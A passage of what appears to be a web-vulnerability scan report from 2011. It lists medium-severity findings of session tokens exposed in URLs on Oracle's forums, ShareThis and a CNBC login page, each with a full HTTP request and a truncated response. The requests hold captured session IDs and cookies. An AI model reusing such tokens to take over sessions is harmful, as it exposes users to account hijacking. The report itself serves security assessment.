<td class="jive-acc-search"><a href="/forums/search!default.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" title="Search"> Search</a>...[SNIP]... <td class="jive-acc-help"><a href="/forums/help.jspa;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" title="FAQ" target="_blank"> FAQ</a>...[SNIP]... <li class="jive-tagset-popularity8" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re010g?categoryID=18" title = "Used 7977 times" > 10g</a >...[SNIP]... <li class="jive-tagset-popularity3" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re011g?categoryID=18" title = "Used 4147 times" > 11g</a >...[SNIP]... <li class="jive-tagset-popularity0" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re09i?categoryID=18" title = "Used 1253 times" > 9i</a >...[SNIP]... <li class="jive-tagset-popularity9" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0apex?categoryID=18" title = "Used 9640 times" > apex</a >...[SNIP]... <li class="jive-tagset-popularity3" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0database?categoryID=18" title = "Used 3705 times" > database</a >...[SNIP]... <li class="jive-tagset-popularity0" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0dba?categoryID=18" title = "Used 1155 times" > dba</a >...[SNIP]... <li class="jive-tagset-popularity0" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0error?categoryID=18" title = "Used 1587 times" > error</a >...[SNIP]... <li class="jive-tagset-popularity0" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0installation?categoryID=18" title = "Used 1112 times" > installation</a >...[SNIP]... <li class="jive-tagset-popularity3" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0oracle?categoryID=18" title = "Used 4074 times" > oracle</a >...[SNIP]... <li class="jive-tagset-popularity0" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0performance?categoryID=18" title = "Used 1241 times" > performance</a >...[SNIP]... <li class="jive-tagset-popularity0" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0pl_sql?categoryID=18" title = "Used 1607 times" > pl_sql</a >...[SNIP]... <li class="jive-tagset-popularity1" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0plsql?categoryID=18" title = "Used 2380 times" > plsql</a >...[SNIP]... <li class="jive-tagset-popularity0" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0report?categoryID=18" title = "Used 954 times" > report</a >...[SNIP]... <li class="jive-tagset-popularity0" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0rman?categoryID=18" title = "Used 904 times" > rman</a >...[SNIP]... <li class="jive-tagset-popularity3" > <a href = "/forums/tags/;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0sql?categoryID=18" title = "Used 4069 times" > sql</a >...[SNIP]... <span><a href="/forums/tags;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?categoryID=18"> View all</a>...[SNIP]... <a href="http://www.oracle.com/us/corporate/index.html"><img alt="Hardware and Software Engineered to Work Together" src="/forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" border="0" height="34" width="182"> </a>...[SNIP]... <a href="http://www.oracle.com/us/syndication/feeds/index.html"><img style="margin-bottom: 1px;" alt="Oracle RSS Feeds" src="/forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0" align="absmiddle" border="0" height="14" width="14"> </a>...[SNIP]... <!-- SiteCatalyst code --><script language="JavaScript" src="/forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b"> </script><script language="JavaScript" src="/forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d79523dd6a08ba471990bd96230d1d2b81.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b"> </script>...[SNIP]...
8.3. https://forums.oracle.com/forums/main.jspa
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/main.jspa
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84
Request
GET /forums/main.jspa;jsessionid=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0?categoryID=84 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: http://www.oracle.com/technetwork/index.html?ssSourceSiteId=ocomen User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_nr=1315343589432; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=51417741.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Content-Language: en-US Content-Type: text/html; charset=UTF-8 Content-Length: 246459 Date: Tue, 06 Sep 2011 16:13:42 GMT Connection: keep-alive Vary: Accept-Encoding Set-Cookie: JSESSIONID=8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0; path=/forums <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>OTN Discussion Forums : Forum Home</title> <meta http-equiv="content-type" content="...[SNIP]...
8.4. https://forums.oracle.com/forums/style/style.jsp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/style/style.jsp
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/style/style.jsp;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
Request
GET /forums/style/style.jsp;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Content-Language: en-IN Last-Modified: Thu, 28 Aug 2008 03:01:38 GMT ETag: "STYLE_JSP_ETAG" Content-Type: text/css; charset=UTF-8 Content-Length: 48579 Date: Tue, 06 Sep 2011 16:13:17 GMT Connection: keep-alive Vary: Accept-Encoding /* --------------------------------------------- */ /* Global Jive Forums 5.x Stylesheet */ /* --------------------------------------------- */ /* ---------------------------------...[SNIP]...
8.5. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/themes/english/resources/feed-icon-14x14.jpg
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
Request
GET /forums/themes/english/resources/feed-icon-14x14.jpg;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Last-Modified: Tue, 06 Sep 2011 16:00:08 GMT ETag: "5.5.30-ad155f4dae3c8bbb7b41e77153238054-503" Content-Type: text/plain Content-Length: 503 Date: Tue, 06 Sep 2011 16:13:20 GMT Connection: keep-alive ......JFIF.....G.G.....C........... ... ....... . ........................... ...C.............. .............................................[SNIP]...
8.6. https://forums.oracle.com/forums/themes/english/resources/info_company.gif
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/themes/english/resources/info_company.gif
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
Request
GET /forums/themes/english/resources/info_company.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT ETag: "5.5.30-31aaea14c05fcefb6736e09849bcc8e4-1711" Content-Type: text/plain Content-Length: 1711 Date: Tue, 06 Sep 2011 16:13:19 GMT Connection: keep-alive GIF89a.."........""fff......"""...UUUDDD.UU....33.ww.......ff..................www......333.DD...............!.......,......"......u^).e...w.p,....M.tA.....W+.S7...J2.P.r5.YG..c..z"..X."...4....~..CZ....[SNIP]...
8.7. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/themes/english/resources/oralogo_small.gif
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
Request
GET /forums/themes/english/resources/oralogo_small.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Last-Modified: Tue, 06 Sep 2011 16:00:09 GMT ETag: "5.5.30-82f0a9b75571a56326f5d9340ef962ef-2059" Content-Type: text/plain Content-Length: 2059 Date: Tue, 06 Sep 2011 16:13:20 GMT Connection: keep-alive GIF89a.......................//................0/.22.33.......,,....oo.......32.......^^............................55....00..........nn...................**.......bb.......66.65.""................_^....[SNIP]...
8.8. https://forums.oracle.com/forums/themes/english/resources/otn_new.css
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/themes/english/resources/otn_new.css
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
Request
GET /forums/themes/english/resources/otn_new.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Last-Modified: Tue, 06 Sep 2011 16:00:10 GMT ETag: "5.5.30-50ebcb915812177e8f99db0d9eb394bd-18986" Content-Type: text/plain Content-Length: 18986 Date: Tue, 06 Sep 2011 16:13:18 GMT Connection: keep-alive Vary: Accept-Encoding /* MASTER FONT FACES */ BODY,H1,H2,H3,H4 {font-family:arial,helvetica,sans-serif;} /* used to remove double space issue in pre tags*/ .jive-message-body pre br, textEditor pre br { display:none; ...[SNIP]...
8.9. https://forums.oracle.com/forums/themes/english/resources/s_code.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/themes/english/resources/s_code.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b
Request
GET /forums/themes/english/resources/s_code.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT ETag: "5.5.30-efb6224f9f8ad100cccc06d67aaeea0a-29511" Content-Type: text/plain Content-Length: 29511 Date: Tue, 06 Sep 2011 16:13:18 GMT Connection: keep-alive /* SiteCatalyst code version: H.19.4. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ ...[SNIP]...
8.10. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/themes/english/resources/s_code_forums.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b
Request
GET /forums/themes/english/resources/s_code_forums.js;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0?a=b HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT ETag: "5.5.30-82e1f8bbd97835a17866085b364ebf72-5398" Content-Type: text/plain Content-Length: 5398 Date: Tue, 06 Sep 2011 16:13:17 GMT Connection: keep-alive /* Setting the s_account */ function s_setAccount(){ var s_account=""; var curUrl = location.href; if(curUrl.indexOf("-stage") != -1 ) { s_account = "oracledevall,oracledevforum1"; }...[SNIP]...
8.11. https://forums.oracle.com/forums/themes/english/resources/spacer.gif
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/themes/english/resources/spacer.gif
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
Request
GET /forums/themes/english/resources/spacer.gif;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Last-Modified: Tue, 06 Sep 2011 16:00:11 GMT ETag: "5.5.30-c895ce2a9c0546d80965bd3eeafcf070-43" Content-Type: text/plain Content-Length: 43 Date: Tue, 06 Sep 2011 16:13:20 GMT Connection: keep-alive GIF89a.............!.......,...........D..;
8.12. https://forums.oracle.com/forums/themes/english/resources/style.css
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://forums.oracle.com
Path:
/forums/themes/english/resources/style.css
Issue detail
The URL in the request appears to contain a session token within the query string:https://forums.oracle.com/forums/themes/english/resources/style.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0
Request
GET /forums/themes/english/resources/style.css;jsessionid=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0 HTTP/1.1 Host: forums.oracle.com Connection: keep-alive Referer: https://forums.oracle.com/forums/category.jspa?categoryID=19 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=8d92100c30d728f28501752240cb948cd3f448304a5d.e34SbxmSbNyKai0Lc3mPbhmSb38Re0; s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343584086; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; BIGipServerforums_prod_pool=202412685.20480.0000
Response
HTTP/1.1 200 OK Server: Oracle-Application-Server-10g Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT ETag: "5.5.30-454e44ddb000046027da50612f1e4157-45429" Content-Type: text/plain Content-Length: 45429 Date: Tue, 06 Sep 2011 16:13:18 GMT Connection: keep-alive Vary: Accept-Encoding /* --------------------------------------------- */ /* Global Jive Forums 5.x Stylesheet */ /* --------------------------------------------- */ /* ----------------------------------...[SNIP]...
8.13. http://l.sharethis.com/pview
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
http://l.sharethis.com
Path:
/pview
Issue detail
The URL in the request appears to contain a session token within the query string:http://l.sharethis.com/pview?event=pview&source=share5x&publisher=4321fb91-a13e-47c8-8a96-426495c5931a&hostname=www.tenzing.com&location=%2Fatg-ecommerce-hosting.asp&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC&sessionID=1315341130568.42115&fpc=d5ad7d-1324070db49-4656e66c-1&ts1315341131009.0&refDomain=www.google.com&refQuery=sourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio
Request
GET /pview?event=pview&source=share5x&publisher=4321fb91-a13e-47c8-8a96-426495c5931a&hostname=www.tenzing.com&location=%2Fatg-ecommerce-hosting.asp&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC&sessionID=1315341130568.42115 &fpc=d5ad7d-1324070db49-4656e66c-1&ts1315341131009.0&refDomain=www.google.com&refQuery=sourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio HTTP/1.1 Host: l.sharethis.com Proxy-Connection: keep-alive Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes
Response
HTTP/1.1 204 No Content Server: nginx/0.7.65 Date: Tue, 06 Sep 2011 15:32:11 GMT Connection: keep-alive
8.14. https://login.cnbc.com/cas/login
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://login.cnbc.com
Path:
/cas/login
Issue detail
The URL in the request appears to contain a session token within the query string:https://login.cnbc.com/cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
Request
GET /cas/login;jsessionid=91914748D5C5843DB9029C8B383DFD63?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check &login_view=register HTTP/1.1 Host: login.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
